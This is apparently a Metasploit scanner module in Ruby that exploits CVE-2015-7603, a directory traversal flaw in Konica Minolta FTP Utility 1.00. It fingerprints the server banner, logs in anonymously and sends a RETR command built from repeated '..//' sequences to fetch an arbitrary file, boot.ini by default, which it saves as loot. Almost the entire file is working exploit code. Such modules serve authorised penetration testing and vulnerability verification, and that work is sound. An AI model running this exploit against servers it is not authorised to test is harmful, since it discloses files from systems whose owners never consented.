Path: blob/master/modules/auxiliary/scanner/ftp/konica_ftp_traversal.rb
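##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Scanner module for CVE-2015-7603: confirms whether a Konica Minolta FTP
# Utility 1.00 server honours traversal sequences in RETR and, when it does,
# retrieves one file (datastore['PATH']) and stores it as loot so the exposure
# is recorded. The Scanner mixin drives run_host once per target.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Ftp
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  # Banner announced by the affected product; matched case-insensitively in check_host.
  VULNERABLE_BANNER = /FTP Utility FTP server \(Version 1\.00\)/i

  # Only this many bytes are read from the data channel, so larger files are truncated.
  MAX_READ_BYTES = 1024

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Konica Minolta FTP Utility 1.00 Directory Traversal Information Disclosure',
      'Description' => %q{
        This module exploits a directory traversal vulnerability found in Konica Minolta FTP Utility 1.0.
        This vulnerability allows an attacker to download arbitrary files from the server by crafting
        a RETR command that includes file system traversal strings such as '..//'
      },
      'Platform' => 'win',
      'Author' =>
        [
          'Jay Turla', # @shipcod3, msf
          'James Fitts', # msf
          'Brad Wolfe <brad.wolfe[at]gmail.com>', # msf
          'shinnai' # initial discovery
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          [ 'EDB', '38260'],
          [ 'CVE', '2015-7603'],
          [ 'URL', 'https://shinnai.altervista.org/exploits/SH-0024-20150922.html']
        ],
      'DisclosureDate' => '2015-09-22'
    ))

    register_options(
      [
        OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),
        OptString.new('PATH', [ true, "Path to the file to disclose, relative to the root dir.", 'boot.ini'])
      ])
  end

  # Fingerprints the service by its greeting banner; no traversal is attempted here.
  #
  # @param ip [String] target address supplied by the Scanner mixin (unused here;
  #   the Ftp mixin's +connect+ targets the current rhost)
  # @return [Msf::Exploit::CheckCode] +Appears+ when the banner names
  #   "FTP Utility FTP server (Version 1.00)", +Safe+ otherwise
  def check_host(ip)
    connect
    # +banner+ may be nil when the server sent nothing; to_s keeps the match safe.
    return Exploit::CheckCode::Appears if VULNERABLE_BANNER.match?(banner.to_s)

    Exploit::CheckCode::Safe
  ensure
    disconnect
  end

  # Scanner callback for one target: login (anonymously, via the Ftp mixin),
  # open the data channel, issue a single traversal-prefixed RETR for
  # datastore['PATH'] and loot whatever the data channel returns.
  #
  # Connection-level failures are reported at verbose level and via elog so
  # the rest of the scan continues; both channels are always closed in +ensure+.
  #
  # @param target_host [String] address supplied by the Scanner mixin (unused
  #   here; the Ftp mixin targets the current rhost)
  # @return [void]
  def run_host(target_host)
    connect_login
    sock = data_connect

    # data_connect may return nil (see #7582); never read from a missing socket.
    # Checking once, up front, replaces the former second check that could not
    # be reached because +sock+ is a local that nothing reassigns.
    if sock.nil?
      failure = "#{__FILE__}::#{__method__}:data_connect failed; possible invalid response"
      print_status(failure)
      elog(failure)
      return
    end

    file_path = datastore['PATH']
    file_name = ::File.basename(file_path)

    # Control-channel reply to the RETR; the file content itself arrives on +sock+.
    retr_cmd = "#{'..//' * datastore['DEPTH']}#{file_path}"
    res = send_cmd(['RETR', retr_cmd])

    response_data = sock.read(MAX_READ_BYTES)
    unless response_data
      print_error("#{file_path} not found")
      return
    end

    # A "150" reply means the server started a transfer; any other reply, or an
    # empty read, is reported as nothing disclosed for this path.
    if response_data.empty? || !res.to_s.match?(/^150/)
      print_status("File (#{file_path})from #{peer} is empty...")
      return
    end

    loot_file = store_loot('konica.ftp.data', 'text', rhost, response_data, file_name, file_path)
    vprint_status("Data returned:\n")
    vprint_line(response_data)
    print_good("Stored #{file_path} to #{loot_file}")
  rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e
    vprint_error(e.message)
    elog(e)
  rescue ::Timeout::Error, ::Errno::EPIPE => e
    vprint_error(e.message)
    elog(e)
  ensure
    data_disconnect
    disconnect
  end
end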